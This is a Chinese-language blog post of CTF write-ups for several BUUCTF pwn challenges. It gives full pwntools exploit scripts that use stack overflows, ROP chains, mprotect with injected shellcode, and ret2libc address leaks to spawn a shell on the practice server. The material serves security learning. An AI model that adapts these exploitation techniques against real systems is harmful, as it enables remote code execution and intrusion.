<h2 id="get-started-3dsctf-2016"><a href="#get-started-3dsctf-2016" class="headerlink" title="get_started_3dsctf_2016"></a>get_started_3dsctf_2016</h2><p>checksec发现开了NX保护，所以栈内容执行不可用，考虑找其他后门函数，搜索flag关键字发现get_flag函数，打开发现是读取flag.txt，所以考虑只需要把return地址改在get_flag函数的if条件句之后即可正常执行，这里注意到main函数时候没有push ebp，所以在压进去0x38字节以后就直接到了return地址处，写出exp为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x38</span> + p32(80489B8)<br></code></pre></td></tr></table></figure>

<p>本地可以打通，但是连到buu远程发现提示core dumped，猜测是远程有内核保护机制，因此就只能尝试保证堆栈平衡的情况下进行处理了</p>
<h3 id="case1"><a href="#case1" class="headerlink" title="case1"></a>case1</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br><span class="hljs-comment">#p=process(&#x27;./get_started_3dsctf_2016&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">27394</span>)<br><span class="hljs-comment"># 0x38 + get_flag入口 + exit地址维持堆栈平衡 + 传参a1, a2</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x38</span> + p32(<span class="hljs-number">0x80489A0</span>) + p32(<span class="hljs-number">0x804E6A0</span>) + p32(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">hex</span>(<span class="hljs-number">814536271</span>), <span class="hljs-number">16</span>)) + p32(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">hex</span>(<span class="hljs-number">425138641</span>), <span class="hljs-number">16</span>))<br><br>p.sendline(payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<h3 id="case2"><a href="#case2" class="headerlink" title="case2"></a>case2</h3><p>第二种是看到大佬的WP才知道的，还可以通过vmprotect来修改某块内存地址的读写权限来执行shell的，函数的具体情况如下</p>
<blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">&gt;<span class="hljs-type">int</span> <span class="hljs-title function_">mprotect</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">void</span> *startaddr, <span class="hljs-type">size_t</span> len, <span class="hljs-type">int</span> prot)</span>;<br></code></pre></td></tr></table></figure>

<p>startaddr 内存起始地址, len修改内存的长度, prot 内存的权限</p>
<p>需要指出的是，指定的内存区间必须包含整个内存页（4K）。区间开始的地址startaddr必须是一个内存页的起始地址，并且区间长度len必须是页大小的整数倍。0x1000&#x3D;4096</p>
<p>prot &#x3D; 7 表示可读可写可执行4+2+1&#x3D;7（r&#x3D;4，w&#x3D;2，x&#x3D;1）</p>
</blockquote>
<p>接着去找内存bss段的一段可用内存，这里我们使用gdb查找</p>
<p><img src="https://image.0error.net/img/2022/20220925184502.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到0x080ea000到0x080ec000这一段是可读可写不可执行的，正符合我们的要求，所以我们就拿这一段来下手</p>
<p>由于在这个过程中我们分别要在mprotect和read里面输入三个参数，都需要维持栈平衡，所以我们需要找到一个进行三次pop的ROP，确保对战还原，程序正常运行，使用ROPgadget查找</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary get_started --only &#x27;pop|ret&#x27; | grep pop<br></code></pre></td></tr></table></figure>

<p>找到了地址<code>0x0804f460</code>有3pop+ret结构，符合我们的要求，因此就用它了</p>
<p>到这里，我们的思路就基本明确了：首先从main函数跳转到mprotect函数，改变指定内存段的读写权限，然后再跳转到read函数，设置读取后将内容保存在前面修改过的内存地址里面，接着我们传入shellcode，获取flag即可，exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br>elf=ELF(<span class="hljs-string">&#x27;./get_started_3dsctf_2016&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">27394</span>)<br><br>pop3_ret = <span class="hljs-number">0x0804f460</span><br><br>mem_addr = <span class="hljs-number">0x080ea000</span><br>mem_size = <span class="hljs-number">0x2000</span><span class="hljs-comment">#根据差值计算</span><br>mem_proc = <span class="hljs-number">0x7</span><span class="hljs-comment">#777</span><br><br>mprotect_addr = elf.symbols[<span class="hljs-string">&#x27;mprotect&#x27;</span>]<br>read_addr = elf.symbols[<span class="hljs-string">&#x27;read&#x27;</span>]<br><br><span class="hljs-comment">#payload = b&#x27;a&#x27;*0x38 + p32(0x80489A0) + p32(0x804E6A0) + p32(int(hex(814536271), 16)) + p32(int(hex(425138641), 16))</span><br><span class="hljs-comment">#覆盖+跳转地址到mprotect+pop3_ret</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x38</span> + p32(mprotect_addr) + p32(pop3_ret)<br><span class="hljs-comment">#mprotect的参数</span><br>payload += p32(mem_addr) + p32(mem_size) + p32(mem_proc)<br>payload += p32(read_addr) + p32(pop3_ret)<br><span class="hljs-comment">#read 的三个参数 read(0,0x080ea000,0x100)</span><br><span class="hljs-comment">#read函数参数1 ,从输入端读取，将我们生成的shellcode读入目标内存地址</span><br><span class="hljs-comment">#读取到的内容复制到指向的内存里</span><br>payload += p32(<span class="hljs-number">0x100</span>) <span class="hljs-comment">#读取大小</span><br>payload += p32(<span class="hljs-number">0</span>) + p32(mem_addr) + p32(<span class="hljs-number">0x100</span>)<br><br>payload += p32(mem_addr) <span class="hljs-comment">#ret esi</span><br><br><span class="hljs-comment">#p.sendline(&#x27;100&#x27;)</span><br>p.sendline(payload)<br>shellcode = asm(shellcraft.sh(),arch=<span class="hljs-string">&#x27;i386&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>p.sendline(shellcode)<br></code></pre></td></tr></table></figure>

<h2 id="level2-x64"><a href="#level2-x64" class="headerlink" title="level2_x64"></a>level2_x64</h2><p>题目拿到手分析有NX保护，排除栈内shellcode一类，打开一看，还是栈溢出，基本轻车熟路了，看到有system可以调用，又看到.data表里面有<code>/bin/sh</code>可以调用，那就直接开搓</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br><span class="hljs-comment">#p=process(&#x27;./level2_x64&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">28117</span>)<br><br>pop_rdi_ret_addr=<span class="hljs-number">0x00000000004006b3</span><br>system_addr=<span class="hljs-number">0x40063E</span><br>binsh_addr=<span class="hljs-number">0x600A90</span><br><br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x80</span> + <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">8</span> + p64(pop_rdi_ret_addr) + p64(binsh_addr) + p64(system_addr)<br><span class="hljs-comment">#p.sendline(&#x27;100&#x27;)</span><br>p.sendline(payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="HarekazeCTF2019-baby-rop"><a href="#HarekazeCTF2019-baby-rop" class="headerlink" title="[HarekazeCTF2019]baby_rop"></a>[HarekazeCTF2019]baby_rop</h2><p>老花样，栈溢出找到system调用&#x2F;bin&#x2F;sh即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br><span class="hljs-comment">#p=process(&#x27;./level2_x64&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">26354</span>)<br><br>system_addr = <span class="hljs-number">0x4005E3</span><br>rdi_ret_addr = <span class="hljs-number">0x0000000000400683</span><br>binsh_addr = <span class="hljs-number">0x601048</span><br><br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span> + <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">8</span> + p64(rdi_ret_addr) + p64(binsh_addr) + p64(system_addr)<br>p.sendline(payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="ciscn-2019-n-5"><a href="#ciscn-2019-n-5" class="headerlink" title="ciscn_2019_n_5"></a>ciscn_2019_n_5</h2><p>保护全关，第一段输入将shellcode写入bss，第二段利用溢出修改返回地址执行shell即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>,arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment">#p=process(&#x27;./ciscn_2019_n_5&#x27;)</span><br>elf=ELF(<span class="hljs-string">&#x27;./ciscn_2019_n_5&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">27642</span>)<br><br>bss_addr=<span class="hljs-number">0x601080</span><br>shellcode=asm(shellcraft.sh())<br>payload=<span class="hljs-string">&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span> + <span class="hljs-number">0x8</span>) + p64(bss_addr)<br><br>p.recvuntil(<span class="hljs-string">&#x27;name&#x27;</span>)<br>p.sendline(shellcode)<br>p.recvuntil(<span class="hljs-string">&#x27;?&#x27;</span>)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="others-shellcode"><a href="#others-shellcode" class="headerlink" title="others_shellcode"></a>others_shellcode</h2><p>这是个啥题啊，直接nc连上就shell了，自始至终都觉得哪里不对劲，但是flag提交成功…</p>
<h2 id="ciscn-2019-ne-5"><a href="#ciscn-2019-ne-5" class="headerlink" title="ciscn_2019_ne_5"></a>ciscn_2019_ne_5</h2><p>这题目有意思，前面都平平无奇，打开以后发现通过admin校验以后可以输出和输出内容，而输入大小是128，最后输出时候使用strcpy存入的数组大小明显小于此值，因此可以构成栈溢出，修改返回地址到system，这里没有<code>/bin/sh</code>字符串，但是有一个<code>fflush</code>可以构造出<code>sh</code>，居然也可以用，新的知识点++，到这里就直接开写了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br><span class="hljs-comment">#context(os=&#x27;linux&#x27;,arch=&#x27;i386&#x27;, log_level = &#x27;debug&#x27;)</span><br><br><span class="hljs-comment">#p=process(&#x27;./ciscn_2019_ne_5&#x27;)</span><br>e=ELF(<span class="hljs-string">&#x27;./ciscn_2019_ne_5&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">27192</span>)<br><br><span class="hljs-comment">#binsh_addr=0x080482EA</span><br>ret_addr=<span class="hljs-number">0x0804843e</span><br>popebp_ret_addr=<span class="hljs-number">0x08048720</span><br>binsh_addr=<span class="hljs-number">0x080482ea</span><br>system_addr=e.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br><br>p.sendlineafter(<span class="hljs-string">&#x27;word:&#x27;</span>, <span class="hljs-string">&#x27;administrator&#x27;</span>)<br>p.sendlineafter(<span class="hljs-string">&#x27;:&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br><br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*(<span class="hljs-number">0x48</span> + <span class="hljs-number">0x4</span>) + p32(system_addr) + p32(binsh_addr) + p32(binsh_addr)<br>p.sendline(payload)<br>p.sendlineafter(<span class="hljs-string">&#x27;:&#x27;</span>,<span class="hljs-string">&#x27;4&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>看似没有什么问题吧，但是放到buu上面一跑</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">timeout: the monitored command dumped core<br></code></pre></td></tr></table></figure>

<p>检查多遍未果，又和师傅们交流也没下文，后来有个师傅自己写了一遍跑通了，遂检查不同之处，发现师傅的system_addr是手写的，于是自己也去找到<code>_system</code>填入地址，写成新的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br><span class="hljs-comment">#context(os=&#x27;linux&#x27;,arch=&#x27;i386&#x27;, log_level = &#x27;debug&#x27;)</span><br><br><span class="hljs-comment">#p=process(&#x27;./ciscn_2019_ne_5&#x27;)</span><br>e=ELF(<span class="hljs-string">&#x27;./ciscn_2019_ne_5&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">27192</span>)<br><br><span class="hljs-comment">#binsh_addr=0x080482EA</span><br>ret_addr=<span class="hljs-number">0x0804843e</span><br>popebp_ret_addr=<span class="hljs-number">0x08048720</span><br>binsh_addr=<span class="hljs-number">0x080482ea</span><br><span class="hljs-comment">#system_addr=e.symbols[&#x27;system&#x27;]</span><br>system_addr=<span class="hljs-number">0x80484d0</span><br><br>p.sendlineafter(<span class="hljs-string">&#x27;word:&#x27;</span>, <span class="hljs-string">&#x27;administrator&#x27;</span>)<br>p.sendlineafter(<span class="hljs-string">&#x27;:&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br><br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*(<span class="hljs-number">0x48</span> + <span class="hljs-number">0x4</span>) + p32(system_addr) + p32(binsh_addr) + p32(binsh_addr)<br>p.sendline(payload)<br>p.sendlineafter(<span class="hljs-string">&#x27;:&#x27;</span>,<span class="hljs-string">&#x27;4&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>通了…后来又仔细看了一下使用symbols输出的地址为<code>0x804a024</code>，回去一看读的是plt-got段的system地址…真是害人不浅啊</p>
<h2 id="铁人三项-第五赛区-2018-rop"><a href="#铁人三项-第五赛区-2018-rop" class="headerlink" title="铁人三项(第五赛区)_2018_rop"></a>铁人三项(第五赛区)_2018_rop</h2><p>checksec看到保护全关，进IDA分析就是很简单的一串逻辑，在第二个函数处看到了明显的溢出，但是题目里面没有直接提供shell相关操作，所以判断本题为ret2libc，题目中给到了write函数，所以考虑使用write函数来泄露</p>
<p>关于write参数<code>fd</code>我找到了如下解释</p>
<blockquote>
<p>write() writes up to count bytes from the buffer starting at buf to the file referred to by the file descriptor fd.</p>
</blockquote>
<p>概言之，就是<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/29921246/why-fd1-is-write-and-fd0-is-read">0 stands for stdin and 1 stands for stdout</a>，不一定正确，但是有助于记忆</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment">#context.log_level=&quot;debug&quot;</span><br><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>,arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment">#p=process(&#x27;./2018_rop&#x27;)</span><br>elf=ELF(<span class="hljs-string">&#x27;./2018_rop&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">26830</span>)<br><br>main_addr = <span class="hljs-number">0x080484C6</span><br>write_plt = elf.plt[<span class="hljs-string">&#x27;write&#x27;</span>]<br>write_got = elf.got[<span class="hljs-string">&#x27;write&#x27;</span>]<br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x88</span> + <span class="hljs-number">0x4</span>) + p32(write_plt) + p32(main_addr) + p32(<span class="hljs-number">1</span>) + p32(write_got) + p32(<span class="hljs-number">4</span>)<br>p.sendline(payload)<br>write_addr = u32(p.recv(<span class="hljs-number">4</span>))<br>libc = LibcSearcher(<span class="hljs-string">&#x27;write&#x27;</span>, write_addr)<br>libc_base = write_addr - libc.dump(<span class="hljs-string">&#x27;write&#x27;</span>)<br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>binsh_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x88</span>+<span class="hljs-number">0x4</span>) + p32(system_addr) + p32(system_addr) + p32(binsh_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="bjdctf-2020-babyrop"><a href="#bjdctf-2020-babyrop" class="headerlink" title="bjdctf_2020_babyrop"></a>bjdctf_2020_babyrop</h2><p>先checksec，64位小端序，MX保护开，其它全关，接着进入IDA分析</p>
<p>main函数内很简单，进一步分析后找到关键函数vuln</p>
<p><img src="https://image.0error.net/img/2022/20221024204049.png" srcset="/img/loading.gif" lazyload></p>
<p>本题没有找到backdoor，所以应该是做基地址泄露然后getshell，整个程序内只有puts函数可以输出内容，因此对puts函数进行修改，先溢出后转到此处，考虑到系统会对堆栈进行平衡，所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡，因此使用ROPgadget先找到符合我们条件的ROP</p>
<blockquote>
<p>在x64中前六个参数依次保存在RDI，RSI，RDX，RCX，R8和 R9寄存器里，如果还有更多的参数的话才会保存在栈上。<br>因此需要找到pop rdi，ret的gadget</p>
</blockquote>
<blockquote>
<p>64位的system调用的大坑<br>64位的system调用会判断rsp的值是否%16&#x3D;0；解决方法是在调用system之前使用ret来帮助解决；<br>然而对齐问题解决就行了吗？不存在的，还是会出现问题。因为这个涉及到栈平衡的问题，所以最好的解决办法，是不要把栈平衡问题遗留到system调用的时候，应该在哪里出现就在哪里解决。</p>
</blockquote>
<p><img src="https://image.0error.net/img/2022/20221024204414.png" srcset="/img/loading.gif" lazyload></p>
<p>puts_got是puts函数的got表项地址，里面装的是puts的真实地址。使用pop_rdi_ret会把puts_got作为参数弹到寄存器rdi上。接着执行puts_plt(puts_got)，就能得到puts真实地址。</p>
<p>到这里我们就可以构造payload了，大体思路就是保持堆栈平衡，然后利用puts函数泄露其got地址，然后找到其对应的lib，就可以修改令其执行&#x2F;bin&#x2F;sh，从而getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment">#context.log_level=&quot;debug&quot;</span><br><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>,arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment">#p=process(&#x27;./bjdctf_2020_babyrop&#x27;)</span><br>elf=ELF(<span class="hljs-string">&#x27;./bjdctf_2020_babyrop&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">28430</span>)<br><br>pop_rdi_addr=<span class="hljs-number">0x0000000000400733</span><br>puts_plt=elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_got=elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>p.recvuntil(<span class="hljs-string">b&quot;story!\n&quot;</span>)<br>main_addr = elf.symbols[<span class="hljs-string">&#x27;main&#x27;</span>]<br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span> + <span class="hljs-number">8</span>) + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)<br>p.sendline(payload)<br>puts_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;puts addr: &quot;</span> + <span class="hljs-built_in">hex</span>(puts_addr))<br>libc = LibcSearcher(<span class="hljs-string">&#x27;puts&#x27;</span>, puts_addr)<br>libc_base = puts_addr - libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)<br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>binsh_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span> + <span class="hljs-number">8</span>) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/buu/">#buu</a>
      
        <a href="/tags/pwn/">#pwn</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>BUUCTF-Pwn</div>
      <div>https://www.0error.net/2021/10/46d4a28d.html</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Jason</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2021年10月11日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/7be08a10.html" title="一些采访内容">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">一些采访内容</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/51f81c34.html" title="个人code-server搭建记录">
                        <span class="hidden-mobile">个人code-server搭建记录</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'cjjcn/cjjcn.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'Comment');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
